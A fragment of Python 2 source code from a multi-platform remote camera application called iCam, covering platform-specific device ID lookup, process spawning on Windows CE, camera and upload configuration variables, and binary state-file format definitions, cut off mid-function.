###############################################################################
###############################################################################
###########################STATE VARIABLES#####################################
###############################################################################
###############################################################################
import binascii
import time
import traceback
def DebugPrint(aText):
try:
if MY_DEBUG_STDOUT:
print aText
sys.stdout.flush()
except:
pass
def DebugPrintErrorTrace():
try:
if MY_DEBUG_STDERR:
traceback.print_exc()
sys.stderr.flush()
except:
pass
if WINDOWS_CE_OS_PYTHONCE:
"""
From http://stackoverflow.com/questions/51658/cross-platform-space-remaining-on-volume-using-python
(see also http://stackoverflow.com/questions/2973480/available-disk-space-on-an-smb-share-via-python
and http://bytes.com/topic/python/answers/609682-how-check-remaining-hard-drive-space-windows)
"""
try:
import ctypes
DebugPrint("Imported ctypes.")
"""
From http://mail.python.org/pipermail/pythonce/attachments/20080906/e52a55e2/attachment-0001.py
(see also http://old.nabble.com/Can-I-execute-external-programs-from-PythonCe--td19307784.html#a19357083)
"""
CreateProcess = ctypes.cdll.coredll.CreateProcessW
WaitForSingleObject = ctypes.cdll.coredll.WaitForSingleObject
GetExitCodeProcess = ctypes.cdll.coredll.GetExitCodeProcess
DWORD = HANDLE = ctypes.c_ulong
except:
DebugPrintErrorTrace()
# Execute a new process and wait until it finishes - because of _wait_process(hPro)
def WinSpawn(path, args):
class _PI(ctypes.Structure):
global DWORD, HANDLE
_fields_ = [("hPro", HANDLE), ("hTh", HANDLE), ("idPro",
DWORD), ("idTh", DWORD)]
def _create_process(cmd, args):
pi = _PI()
CreateProcess(
unicode(cmd),
unicode(args),
0,
0,
0,
0,
0,
0,
0,
ctypes.byref(pi)
)
return pi.hPro
def _wait_process(hPro):
WaitForSingleObject(hPro, ctypes.c_ulong(0xffffffff))
return GetExitCodeProcess(hPro)
def _quote(s):
if " " in s:
return '"%s"' % s
return s
def MyJoin(args, myChar):
myRes = ""
for i in range(len(args) - 1):
myRes += _quote(args[i]) + myChar
if len(args) >= 1:
myRes += _quote(args[len(args) - 1])
return myRes
def execv(path, args):
if not type(args) in (tuple, list):
raise TypeError, "execv() arg 2 must be a tuple or list"
path = os.path.abspath(path)
"""
#This crashes pyobfuscate
args = " ".join(_quote(arg) for arg in args)
_create_process(path, args)
"""
myArgs = MyJoin(args, " ")
_create_process(path, myArgs)
def execve(path, args, env):
execv(path, args)
DebugPrint("Entered WinSpawn().")
try:
# Was called systema before - def systema(path, args):
if not type(args) in (tuple, list):
raise TypeError, \
"systema() arg 2 must be a tuple or list"
path = os.path.abspath(path)
"""
args = " ".join(_quote(arg) for arg in args)
hPro = _create_process(path, args)
"""
myArgs = MyJoin(args, " ")
hPro = _create_process(path, myArgs)
return _wait_process(hPro)
except:
DebugPrintErrorTrace()
elif WINDOWS_OS:
try:
import ctypes
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# This is for the case when there is no SIM card in the cellphone.
NO_GSM_SIGNAL_STRENGTH = -1234
signalStrength = NO_GSM_SIGNAL_STRENGTH
signalUnits = ""
accessPointName = u""
"""
If accessPointRetryConnect is True it means that connection to the AP
accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
def NoInternetConnection():
global accessPointName, accessPointRetryConnect
return (accessPointRetryConnect == True) or (accessPointName == u"")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
import globalui
def DisplayNote(aText, waitTime=2.0):
if SYMBIAN_OS:
if waitTime == 2.0:
# appuifw.note(unicode(aText), "info")
# appuifw.note(unicode(aText), "error")
appuifw.note(unicode(aText), "conf")
elif waitTime == -1.0:
"""
Good
From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/04._Basic_User_Interface.
The ONLY problems with this one is that it has a progress bar and a
Cancel button instead of OK.
"""
globalui.global_note(unicode(aText), "wait")
elif ANDROID_OS:
# It's shown only for 2 secs
#globalui.global_note(u"Item available", "info")
# It's shown only for 2 secs
#globalui.global_note(u"Message", "text")
# It is really permanent note - you have to restart Symbian after this :))
#globalui.global_note(unicode("Your device ID (IMEI): " + deviceId + "."), "perm")
"""
Quite good: The problem with this one is that you can focus on the
IMEI number and also that it has 2 buttons: Ok and Back.
"""
# Not nice - truncated
# Old: appuifw.popup_menu([u" "],
# unicode("Your phone ID (and IMEI number) is " + deviceId + "."))
# Old: appuifw.popup_menu([u"(and IMEI number) is",
# unicode(deviceId + ".")], unicode("Your phone ID"))
#appuifw.popup_menu([unicode(deviceId + ".")],
# unicode("Your device ID (IMEI):"))
"""
Maybe see "Using AVKON UI Notes API" -
see http://www.forum.nokia.com/document/Cpp_Developers_Library/GUID-759FBC7F-5384-4487-8457-A8D4B76F6AA6/html/Notes_API4.html
"""
"""
The problem with this one is that you can focus on the IMEI number
and also that it has 2 buttons: Ok and Back.
See a list of various UI dialogs here:
http://www.mobilenin.com/pys60/info_dialogue_notes.htm .
"""
#appuifw.note(unicode("Your device ID (IMEI) is " +
# deviceId + "."), "info")
# Doesn't help the global flag either.
#appuifw.note(unicode("Your device ID (IMEI): " +
# deviceId + "."), "conf", 1)
# Not good: it fills up the entire screen and it truncates the text,
# being too long.
#appuifw.selection_list([unicode("Your phone ID (and IMEI number) is " +
# deviceId + ".")], 0)
try:
myDroid.makeToast(aText)
# It appears the Toast notification takes invariably 2 seconds.
time.sleep(waitTime)
except:
DebugPrintErrorTrace()
def DialogMultipleChoices(title, comboList, initialChoice):
if ANDROID_OS:
try:
myDroid.dialogCreateAlert(title)
# See http://www.mithril.com.au/android/doc/UiFacade.html#dialogSetSingleChoiceItems
myDroid.dialogSetSingleChoiceItems(comboList, int(initialChoice))
myDroid.dialogSetPositiveButtonText("OK")
myDroid.dialogShow()
#DisplayNote(str(myDroid.dialogGetResponse()))
"""
It displays, I think, {u'which': u'positive'} - probably this is
the result of pressing the OK button.
"""
# See http://www.mithril.com.au/android/doc/UiFacade.html#dialogGetSelectedItems
#DisplayNote(str(myDroid.dialogGetSelectedItems()))
"""
myDroid.dialogGetSelectedItems() returns, for example:
Result(id=81 , result=[1], error=None)
"""
DebugPrint("DialogMultipleChoices(): " \
"myDroid.dialogGetResponse() = %s\n" % \
str(myDroid.dialogGetResponse()) +
"DialogMultipleChoices(): " \
"myDroid.dialogGetSelectedItems() = %s" % \
str(myDroid.dialogGetSelectedItems()))
# !!!!TODO: think if necessary - Don't allow reading events:
#myAllowReadEvents = False
res = int(myDroid.dialogGetSelectedItems().result[0])
#Once I got here: TypeError: int() argument must be a string or a number, not 'dict'
return res
except:
DebugPrintErrorTrace()
return 0
def DialogGetInput(aTitle, aTextMore, aInitVal):
global myAllowReadEvents
if SYMBIAN_OS:
resStr = appuifw.query(unicode(aTitle) + aTextMore, "text",
unicode(aInitVal)) # "number", "code", etc
elif ANDROID_OS:
try:
# Don't allow reading events:
myAllowReadEvents = False
resStr = myDroid.dialogGetInput(aTitle, aTextMore, aInitVal).result
if (resStr is None) or (resStr == []):
resStr = ""
DebugPrint("DialogGetInput(): resStr = %s." % resStr)
myAllowReadEvents = True
except:
DebugPrintErrorTrace()
return resStr
if iOS_PYOBJC:
import subprocess
def GetSerialAndRevision_Raspbian():
"""
Inspired from
https://raspberrypi.stackexchange.com/questions/2086/how-do-i-get-the-serial-number
From http://elinux.org/RPi_HardwareHistory - for revision number
cat /proc/cpuinfo
"""
DebugPrint("Entered GetSerialAndRevision_Raspbian()")
# Extract serial from cpuinfo file
cpuserial = "RPi" #"0000000000000000"
try:
f = open("/proc/cpuinfo", "r")
for line in f:
if line[0:6] == "Serial":
cpuserial += line[10:26]
break
f.close()
except:
cpuserial = "ERROR000000000"
DebugPrint("GetSerialAndRevision_Raspbian(): cpuserial = %s" % cpuserial)
return cpuserial
def GetDeviceId_iPhone():
"""
This is a named tuple - see
http://docs.python.org/library/collections.html#collections.namedtuple
"""
# TypeError: tuple indices must be integers, not str
#print "deviceId =", deviceId["result"]
# Result(id=1, result=u'00...', error=None)
#print "deviceId =", deviceId
#print "deviceId[1] =", deviceId[1]
#print "deviceId[0] =", deviceId[0]
#print "deviceId =", deviceId.result
try:
DebugPrint("GetDeviceId(): calling subprocess.call().")
"""
See http://stackoverflow.com/questions/6441807/spawn-a-new-non-blocking-process-using-python-on-mac-os-x
(also http://stackoverflow.com/questions/2260614/how-to-switch-to-a-python-subprocess-created-by-ipython-on-os-x)
"""
# Nothing happens.
# subprocess.call(["/Applications/pyExamp.app/pyExamp", "", ""])
# , stdout = None, stderr = fOutput)
# subprocess.call(["/Applications/pyExamp.app/pyExamp"])
# , stdout = None, stderr = fOutput)
# os.system("/Applications/pyExamp.app/pyExamp")
# fOutput = open("/var/mobile/iCam/IMEI.txt", "wb")
fOutput = open(LOCAL_FOLDER + "/IMEI.txt", "wb")
#subprocess.call(["/var/14/deviceinfo", "-i"], stdout = fOutput,
# stderr = None) #fOutput)
#subprocess.call([LOCAL_FOLDER + "/deviceinfo", "-i"],
# stdout = fOutput, stderr = None)
subprocess.call([sys.path[0] + "/deviceinfo", "-i"],
stdout=fOutput, stderr=None)
fOutput.close()
except:
traceback.print_exc()
sys.stderr.flush()
# threading.Timer(0.1, ExecProcess).start()
# thread.start_new_thread(ExecProcess, ())
# ExecProcess()
try:
fInput = open(LOCAL_FOLDER + "/IMEI.txt", "r")
myRes = fInput.read()
fInput.close()
#DebugPrint("GetDeviceId(): (before) myRes = %s" % myRes)
myRes = myRes.rstrip(" \r\n")
#DebugPrint("GetDeviceId(): (after) myRes = %s" % myRes)
except:
DebugPrintErrorTrace()
myRes = IMEI_IOS
return myRes
def GetDeviceId():
"""
Returns the deviceId of the running device.
!!IMPORTANT: deviceId should not have '_' chars in it, because I am using
'_' as separator char in filenames containing deviceId also.
deviceId has normally 15-17 chars (e.g., "N95N95N95N95N95", "HTCHTCHTCHTCTCR")
"""
DebugPrint("Entered GetDeviceId()")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# sysinfo.imei() returns unicode string, so we convert to ASCII string.
return str(sysinfo.imei())
elif SYMBIAN_UIQ_OS:
return IMEI_UIQOS
elif ANDROID_OS:
# From PhoneFacade
return str(myDroid.getDeviceId().result)
elif iOS_PYOBJC:
return GetDeviceId_iPhone()
elif WINDOWS_OS:
return IMEI_WinOS #Note that this has 14 chars lenght, not 15
elif WINDOWS_CE_OS_PYTHONCE:
#WinSpawn(r"\Storage Card\iCam_WinMobile\GetIMEI.exe", [])
# We use \ instead of /
#WinSpawn(r"\Storage Card\iCam\GetIMEI.exe", [])
tmpPathFileName = LOCAL_FOLDER + "/GetIMEI.exe"
# I think we require backslashes.
tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
WinSpawn(tmpPathFileNameWithBackslashes, [])
time.sleep(5.0)
try:
# fInput = open(r"\Storage Card\iCam\IMEI.txt", "r")
fInput = open(LOCAL_FOLDER + "/IMEI.txt", "r")
myRes = fInput.read()
fInput.close()
except:
DebugPrintErrorTrace()
myRes = IMEI_WinCEOS
return myRes
elif UNIX_OS:
return IMEI_UNIXOS
elif RASPBIAN_OS:
#!!!!TODO: use hostname
#!!!!!!!!TODO: use GetSerialAndRevision_Raspbian()
myRes = GetSerialAndRevision_Raspbian()
return myRes #str("RPi")
###############################################################################
###############################################################################
###############################################################################
################MOST OF THE STATE VARIABLES START FROM HERE####################
#####################(BUT SOME ARE ALSO DEFINED ABOVE)#########################
###############################################################################
# Note that GetDeviceId() returns an ASCII string.
if ANDROID_OS and ANDROID_OS_QPYTHON:
deviceId = "ANDROID_OS_QPYTHON_phone"
# !!!!TODO: QPython, because it doesn't have permissions, GetDeviceId() gives
# "java.lang.SecurityException: Requires READ_PHONE_STATE: Neither user 10156 nor current process has android.permission.READ_PHONE_STATE."
else:
deviceId = GetDeviceId()
"""
localPhotoResolution = None
localVideoMode = None
"""
localPhotoResolution = [(0, 0), (0, 0)] # [(width, height), ...]
localVideoMode = [(0, 0), (0, 0)] # Example: localVideoMode = [((176, 144), 15.0), ((176, 144), 15.0)]
# modeManagerIsEnabled = True
modeManagerIsEnabled = False
burstModeIsStarted = False
"""
Burst mode take as many frames as possible per second when the viewfinder is
on. This happens when pauseInterval == 0.
"""
motionDetectionIsOn = False
# Detect simple changes in images.
#motionDetectionIsOn = True
# Simply detect noise
#noiseDetectionEnabled = True
# faceDetection, body tracking
# soundDetection #a human talking, a dog barking, a bird singing
"""
IMPORTANT NOTE: In landscape mode, N82 has a resolution of (320, 199) -
surprisingly it seems to be 199, not 200. The rest of 41 pixels is for
the system status.
#This is conserving aspect ratio for (320, 240), as for (176, 144)
# VIEWFINDER_SIZE_ORIG = (293, 240)
"""
if SYMBIAN_OS:
if SYMBIAN_3:
VIEWFINDER_SIZE_ORIG = (293, 240)
else:
# VIEWFINDER_SIZE_ORIG = (73, 60) #Bad
VIEWFINDER_SIZE_ORIG = (293, 240) # Good
else:
# VIEWFINDER_SIZE_ORIG = (80, 60) #Bad
# VIEWFINDER_SIZE_ORIG = (176, 144) #Bad
# This is conserving aspect ratio for (240, 180), as for (176, 144)
# VIEWFINDER_SIZE_ORIG = (220, 180)
VIEWFINDER_SIZE_ORIG = (-1, -1)
# SIZE_VIEWFINDER = (320, 240)
# SIZE_VIEWFINDER = (512, 384)
# SIZE_VIEWFINDER = (640, 480)
viewFinderSize = VIEWFINDER_SIZE_ORIG
readGPS = 0 # False
gpsInfo = {"position": {}, "course": {}, "satellites": {}}
# We assume 2 cameras by default.
numCamerasSupported = 2
"""
The default configuration for the application.
pauseInterval represents the interval of time the system waits between media
capture actions (video recordings, take photos).
NOT USED: pauseInterval represents the interval of time the system waits in a
Reactive loop.
"""
PAUSE_INTERVAL_POWER_MANAGED = 10 * 60 * 60 # 10 hours
pauseInterval = 120 # 2 minutes
"""
YouTube (and Picasa?) might give exceptions if uploading too often videos,
delete, create or delete new playlists --> we wait between such
consecutive operations.
"""
pauseIntervalGdata = 60
digitalZoom = 0 # no zoom
photoResolutionIndex = 6 # 320x240
photoModeIndex = [3, 2] # JPEG_Exif, RGB24
photoQuality = 50 # 50% quality
exposureIndex = [0] * 2
whiteBalanceIndex = [0] * 2
flashIndex = 1
audioRecordDuration = 0
videoRecordDuration = [30, 30] # [0, 0] #[0, 7]
rotateDegreesImage = 0
localQualityIndex = 0
localPhotoResolutionIndex = [None, None]
# 0 = None, 1 = Only Video, 2 = Only Photo, 3 = Both Photo and Video
cameraMode = [1, 0]
if RASPBIAN_OS: #!!!!TODO: doesn't work well - try more
cameraMode = [2, 0]
# Currently cannot record video on iOS
if iOS_PYOBJC:
cameraMode = [2, 0]
videoAudioEnabled = 1 # True #False
localVideoModeIndex = [0, 0] # [None, None]
"""
0 = no local storage;
1 = store all media (on SD card);
in the future, we should have other values as well
(e.g., 2 = store only movies, but not photos)
"""
storeLocallyMedia = 1
"""
orientationForThisPhoneModel on Symbian has to do with the orientation of the
camera. It can be "portrait" (normal) or "landscape".
"""
orientationForThisPhoneModel = "portrait" #"landscape"
mobileCountryCode = -1
mobileNetworkCode = -1
locationAreaCode = -1
cellId = -1
phoneModel = ""
# We can use lookup after deviceId to get the phoneNumber
# phoneNumber = "no_phone_number" + phoneModel
phoneNumber = "no_phone_number"
# 0 is None; 1 is BT server; 2 is BT client
bluetoothMode = 0
bluetoothServerAddress = ""
bluetoothSelfAddress = "00:00:00:00:00:00" # ""
bluetoothSelfName = ""
cameraPhotoSizes_JPEG_Exif = [None, None]
cameraPhotoSizes_RGB24 = [None, None]
"""
cameraVideoFormats = [None, None]
cameraVideoFrameSizes = [None, None]
cameraVideoModes = [None, None]
"""
cameraVideoFormats = [[], []] # Ex: cameraVideoFormats[1] = ['EFormatYUV420Planar']
cameraVideoFrameSizes = [[], []] # Ex: cameraVideoFrameSizes[1] = [(640, 480), (352, 288), (320, 240), (176, 144)]
cameraVideoModes = [[], []] # Ex: cameraVideoModes[1] = [{"rate": 15.0, "size": (176, 144)}]
myMaxRamdriveSize = -1
differentPixelsPercentage = 10
differentPixelsPercentageThreshold = [-1, -1]
stateTime = None
dawnTimeVec = [-1, -1, -1]
duskTimeVec = [-1, -1, -1]
"""
When the phone receives internetUploadMaxErrors upload errors we Quit iCam.
This is extremely useful for SYMBIAN_OS, where we programatically connect
to the AP when iCam starts, so restarting iCam is certain to reconnect
to the AP.
The value should be at least specific per type of
mobile OS - to be set accordingly.
"""
internetUploadMaxErrors = 20 #100
"""
Used for InternetUploadBinaryData() and YouTubeVideoUpload().
TODO:!!!! use it for PicasaPhotoUpload(), as well.
"""
internetUploadErrorsCounter = 0
# Upload all BT messages.
# Upload that many videos in reverse chronological order:
uploadHowManyOfLatestBluetoothMessages = 4 # 5
# Upload that many videos in chronological order - not really great if there are many:
#uploadHowManyOfLatestBluetoothMessages = -1
###############################################################################
###############################################################################
###############################################################################
###########################END STATE VARIABLES#################################
###############################################################################
###############################################################################
"""
Have to declare atom and gdata global in order to import the modules in the
global scope in ImportGdataModules().
"""
atom = None
gdata = None
gdataModulesImported = False
"""
In PyS60 I cannot bypass the standard library module loading.
Hence we need to load the module ourselves, before any other (sub)module.
Once we load the module M explicitly, it is in the program modules dictionary
and any subsequent module that loads the module M will refer to this module
and will not load again the module.
Note that although the import gets lost when leaving ImportMyModule() since it is
local, it seems that the operations performed are enough in order to load the
second time the module from the same path as here.
"""
"""
# Just for testing purposes
array = None
def ImportArray():
if WINDOWS_OS:
if sys.version_info[0 : 2] != (2, 2):
return
else:
return
try:
import imp
DebugPrint(str(imp.find_module("array"))
#modulePathFileName = "C:\\Python22_S60\Lib\\urlparse.py"
if True: #False:
modulePathFileName = "C:\\Python22\\Lib\\site-packages\\array.py"
fInput = open(modulePathFileName, "rb")
global array
array = imp.load_module("array", fInput, modulePathFileName, ('.py', 'r', 1))
DebugPrint("Alex: %s" % str(array))
except:
DebugPrintErrorTrace()
ImportArray()
"""
#urlparse = None
def ImportMyModule():
try:
import imp
#DebugPrint(str(imp.find_module("urlparse"))
if False:
modulePathFileName = "C:\\Python22_S60\\Lib\\site-packages\\urlparse.py"
fInput = open(modulePathFileName, "rb")
res = imp.load_module("urlparse", fInput, modulePathFileName, ('.py', 'r', 1))
#DebugPrint("Alex: %s" % str(res))
modulePathFileName = "E:\\Private\\e21e55e0\\site-packages\\urlparse.pyc"
fInput = open(modulePathFileName, "rb")
res = imp.load_compiled("urlparse", modulePathFileName, fInput)
#DebugPrint("Alex: %s" % str(res))
except:
DebugPrintErrorTrace()
def ImportGdataModules():
global atom, gdata
global gdataModulesImported
DebugPrint("Entered ImportGdataModules(): gdataModulesImported = %d." % \
gdataModulesImported)
if gdataModulesImported == False:
try:
if gdata is None:
import gdata
#if sys.version_info[0 : 2] == (2, 2):
if SYMBIAN_OS:
if not _PyS60_1_9_OR_NEWER:
ImportMyModule()
#"""
try:
import gdata.tlslite
except:
DebugPrintErrorTrace()
try:
import gdata.tlslite.utils
except:
DebugPrintErrorTrace()
try:
import gdata.tlslite.utils.keyfactory
except:
DebugPrintErrorTrace()
#"""
if uploadMediaToYouTube or uploadMediaToPicasa:
# if atom is None:
import atom
"""
# As suggested in http://effbot.org/zone/import-confusion.htm,
# I could give:
atom = __import__("atom")
# but this doesn't work well for "gdata.youtube" :) - it gives
# error when loading module gdata.youtube because it is written
# trickier... :)
"""
# See maybe http://docs.python.org/release/2.5.2/ref/import.html
import gdata.media
if uploadMediaToYouTube:
import gdata.youtube
import gdata.youtube.service
if uploadMediaToPicasa:
import gdata.photos
# Gives MemoryError if I use default.py directly
import gdata.photos.service
import gdata.tlslite.utils.Python_AES
gdataModulesImported = True
except:
gdataModulesImported = False
DebugPrint("Not able to import the gdata (and atom) modules.")
DebugPrintErrorTrace()
# ImportGdataModules()
"""
We try to be "lazy" (as in lazy evaluation) in importing the gdata modules -
we want to import them ALAP.
"""
"""
googleUsername = "MOBILEREVIVAL"
# Note that googleKeywords could also store location, phone name, etc:
googleKeywords = "Cernica N82"
"""
googleUsername = None
googlePassword = None
googlePasswordEncrypted = None
googleKeywords = deviceId
"""
This is the keyword that we add for all devices in the BT network.
TODO!!!!: The keyword should be added through UI at the BT server.
"""
btNetSearchKeywords = "Cernica" #N82"
"""
if ANDROID_OS:
#googleKeywords = GetPhoneModel() #"Android device"
elif SYMBIAN_OS:
#googleUsername = "ender..."
#googleKeywords = "E7"
googleKeywords = deviceId
"""
"""
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
"""
# if gdataModulesImported:
"""
# OLD meaning: useiCamServer = 0 # 0 = just state, 1 = all
useiCamServer:
0 = no (none),
1 = no Media upload (state, log, download updates and commands),
2 = all (upload State + Media, download updates and commands)
"""
useiCamServer = None
if (SYMBIAN_OS and S60_EDITION[0] >= 3) or ANDROID_OS or iOS_PYOBJC:
uploadMediaToYouTube = 1
uploadMediaToPicasa = 1
useiCamServer = 0 # 1
if deviceId == IMEI_E7:
uploadMediaToIQEngines = 0 # 1
else:
uploadMediaToIQEngines = 0
else:
"""
On WINDOWS_CE_OS_PYTHONCE I don't have (yet) OpenSSL so gdata complains
(ssl module not found or so) and I can't login to Google gdata servers.
On WINDOWS_OS I normally prefer to test intranet performance with the iCam
server running on the Linux VMWare box.
"""
uploadMediaToYouTube = 0
uploadMediaToPicasa = 0
useiCamServer = 2
uploadMediaToIQEngines = 0
googleRememberPassword = 1
googleMediaPrivate = 1
if WINDOWS_CE_OS_PYTHONCE:
ImportGdataModules()
googleUsername = ""
# For test only.
"""
Yes, we use one space because StoreLocalConfigInFile() requires at least 1
char to generate an encrypted password. :)
"""
googlePassword = " "
googlePasswordEncrypted = ""
# StoreLocalConfigInFile()
###############################################################################
###############################################################################
###############################################################################
###########################END CONFIG VARIABLES################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
#######################BEGIN STATE LOAD/STORE FUNCTIONS########################
###############################################################################
###############################################################################
import struct
"""
!!!!IMPORTANT: do not change easily deviceIdFormat and statePackFormat*,
since we use them in quite a few places.
"""
deviceIdFormat = "<100s"
# See http://docs.python.org/2/library/struct .
# Note: <i is 32 bits long integers, in little endian format.
"""
Format C Type Python type Standard size Notes
x pad byte no value
c char string of length 1 1
b signed char integer 1 (3)
B unsigned char integer 1 (3)
? _Bool bool 1 (1)
h short integer 2 (3)
H unsigned short integer 2 (3)
i int integer 4 (3)
I unsigned int integer 4 (3)
l long integer 4 (3)
L unsigned long integer 4 (3)
q long long integer 8 (2), (3)
Q unsigned long long integer 8 (2), (3)
f float float 4 (4)
d double float 8 (4)
s char[] string
p char[] string
P void * integer (5), (3)
"""
# statePackFormat = "<iiiiiiii"
# sizeStateMarshalled
statePackFormat00 = "<i"
"""
bbbB
uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
internetUploadMaxErrors,
ibbbb
BATTERY_LEVEL_THRESHOLD,
reactiveLoopOpsIndex, sentBTMessageTo6680, 0, 0,
ii
mediaFileSize, 0,
i
uploadHowManyOfLatestBluetoothMessages,
bbb
modeManagerIsEnabled, startAutomatically, saveUnsentPackets,
b
uploadUnsentData,
bbbb
MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, MY_DEBUG_UPLOAD_MSG
"""
statePackFormat01 = "<bbbBibbbbiiibbbbbbbb"
"""
!!!!IMPORTANT: do not change easily statePackFormat02 since we use it in
GetInfoFromSMFBtMsg(), the least.
"""
# accessPointName, MAC bluetoothSelfAddress (the 6 bytes), tmpBluetoothServerAddress, cameraId
statePackFormat02 = "<44sBBBBBB20si"
# crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday, crtTime.tm_hour,
# crtTime.tm_min, crtTime.tm_sec, numMilliseconds
#statePackFormat03 = "<iiiiiii"
statePackFormat03 = "<iibbbbi"
#int(GetTime()), 0, 0
statePackFormat03b = "<iii"
# GetBatteryLevelPercentage(), main_drive_free_space, memory_card_free_space,
# GetFreeRAM(), 0, sysagent.charger_status()
statePackFormat04 = "<iqqiii"
# The 2s is for the signalUnits. signalStrength
statePackFormat05 = "<2si"
# pauseIntervalGdata,pauseInterval,burstModeIsStarted,
# photoResolutionIndex, 0, localPhotoResolutionIndex[0],
# localPhotoResolutionIndex[1], photoModeIndex[0]
statePackFormat06 = "<iiiiiiii"
# photoModeIndex[1], digitalZoom, 0, photoQuality, 0, exposureIndex[0],
# exposureIndex[1]
statePackFormat07 = "<iiiiiii"
# whiteBalanceIndex[0], whiteBalanceIndex[1], flashIndex, 0
statePackFormat08 = "<iiii"
# 0, 0, 0, 0, 0, 0, 0, 0. Indices for:
# ExposureCompensation, ISO, contrast, sharpness, color tone, Scene Modes
statePackFormat09 = "<32s32s32s32s"
# Reserved (ex: ShutterSpeed)
# Reserved: indices for localVideoMode (VideoFrameRates, VideoEncoding),
# Video Stabilization, Audio Recording, etc
# (Note: Camera app on S60 on N82 has presets: TV High Quality,
# TV Normal Quality, Email High Quality, Email Normal Quality,
# Sharing Quality)
# Reserved (ex: sent videoResolution)
# videoRecordDuration[0], videoRecordDuration[1], localVideoModeIndex[0],
# localVideoModeIndex[1], cameraMode[0], cameraMode[1], videoAudioEnabled,
# 0 (maybe videoAudioEnabled camera with id 1),
statePackFormat10 = "<iiiibbbb"
# Reserved (ex: audioType - MP3 or AMR)
statePackFormat11 = "<20s"
# audioRecordDuration, 0, 0, 0, 0, 0, 0 (reserved for other durations)
statePackFormat12 = "<i24s"
# rotateDegreesImage, the rest is reserved
statePackFormat13 = "<i28s"
# mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
statePackFormat14 = "<iiii"
# Reserved
statePackFormat15 = "<32s"
# storeLocallyMedia. And reserved for "Choose when to send Unsent", plugged
# and charging or not
statePackFormat16 = "<i28s"
# motionDetectionIsOn, differentPixelsPercentageThreshold[0];
# Reserved for noiseDetectionEnabled, faceDetection,
# soundDetection (a human talking, a dog barking, a bird singing)
statePackFormat17 = "<if24s"
# Reserved for motion detection params (thresholds, etc)
statePackFormat18 = "<32s32s32s32s"
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved for the result(s) returned by the simple detection algorithm(s).
# Reserved (ex: readGPS)
statePackFormat19 = "<32s"
# GPS data (gpsInfo)
statePackFormat20 = "<dddddddddddddii"
# Reserved for gps related.
statePackFormat21 = "<32s32s"
# logAccelerometerAndRotationSensors, and reserved
statePackFormat22 = "<i28s"
# 14 * 32 bytes (strings) reserved. fileName
# statePackFormat23 = "<32s32s32s32s32s32s32s32s32s32s32s32s32s32s256s"
# 13 * 32 bytes (strings) reserved.
statePackFormat23 = "<32s32s32s32s32s32s32s32s32s32s32s32s32s"
# Reserved dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], 0, duskTimeVec[0],
# duskTimeVec[1], duskTimeVec[2], 0
statePackFormat24 = "<20sbbbbbbbb"
statePackFormat25 = "<i" # No value: 0
statePackFormat26 = "<128s" # fileName
statePackFormat27 = "<124s" # ICAM_SERVER_NAME
statePackFormat28 = "<i" # CRC32 of the state
statePackFormat = statePackFormat00 + statePackFormat01[1:] + \
statePackFormat02[1:] + statePackFormat03[1:] + statePackFormat03b[1:] + \
statePackFormat04[1:]
statePackFormat += statePackFormat05[1:] + statePackFormat06[1:] + \
statePackFormat07[1:] + statePackFormat08[1:] + \
statePackFormat09[1:]
statePackFormat += statePackFormat10[1:] + statePackFormat11[1:] + \
statePackFormat12[1:] + statePackFormat13[1:] + \
statePackFormat14[1:]
statePackFormat += statePackFormat15[1:] + statePackFormat16[1:] + \
statePackFormat17[1:] + statePackFormat18[1:] + \
statePackFormat19[1:]
statePackFormat += statePackFormat20[1:] + statePackFormat21[1:] + \
statePackFormat22[1:] + statePackFormat23[1:] + \
statePackFormat24[1:]
statePackFormat += statePackFormat25[1:] + statePackFormat26[1:] + \
statePackFormat27[1:] + statePackFormat28[1:]
def LoadStateFromFile(pathFileName, myDebugStdout=MY_DEBUG_STDOUT, \
myDebugStderr=MY_DEBUG_STDERR):
global burstModeIsStarted, photoResolutionIndex, photoQuality, \
pauseInterval, pauseIntervalGdata, digitalZoom
global localPhotoResolutionIndex, photoModeIndex, exposureIndex, \
whiteBalanceIndex, flashIndex
global startViewfinderBeforeTakingPhoto
global audioRecordDuration, videoRecordDuration
global localVideoModeIndex, cameraMode, videoAudioEnabled
global accessPointName, bluetoothServerAddress
global motionDetectionIsOn, differentPixelsPercentageThreshold
global rotateDegreesImage
global statePackFormat
global storeLocallyMedia
global modeManagerIsEnabled, dawnTimeVec, duskTimeVec
global startAutomatically
global BATTERY_LEVEL_THRESHOLD
global reactiveLoopOpsIndex
global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
MY_DEBUG_UPLOAD_MSG
global ICAM_SERVER_NAME
global saveUnsentPackets, uploadUnsentData, internetUploadMaxErrors, \
uploadHowManyOfLatestBluetoothMessages
global sentBTMessageTo6680
global stateTime
if myDebugStdout:
print "Entered LoadStateFromFile(pathFileName = %s)." % pathFileName
sys.stdout.flush()
try:
"""
if myDebugStdout:
print "os.path.isfile(%s) = %s." % (pathFileName,
os.path.isfile(pathFileName))
sys.stdout.flush()
"""
# pathFileNameBackup = STATE_PATH_FILENAME_BACKUP
pathFileNameBackup = pathFileName + STATE_BACKUP_EXTENSION
if not os.path.isfile(pathFileName):
if myDebugStdout:
print "The state file %s doesn't exist." % pathFileName
sys.stdout.flush()
if os.path.isfile(pathFileNameBackup):
if myDebugStdout:
print "We found the backup of the state file (%s) --> " \
"we restore it as the original state file." % \
pathFileNameBackup
sys.stdout.flush()
MoveFileBetweenAnyDrives(pathFileNameBackup, pathFileName)
else:
# pathFileName = pathFileNameBackup
return False
try:
fInput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
fileData = fileData.decode("zlib")
except:
"""
There was an error reading pathFileName (it happened once that
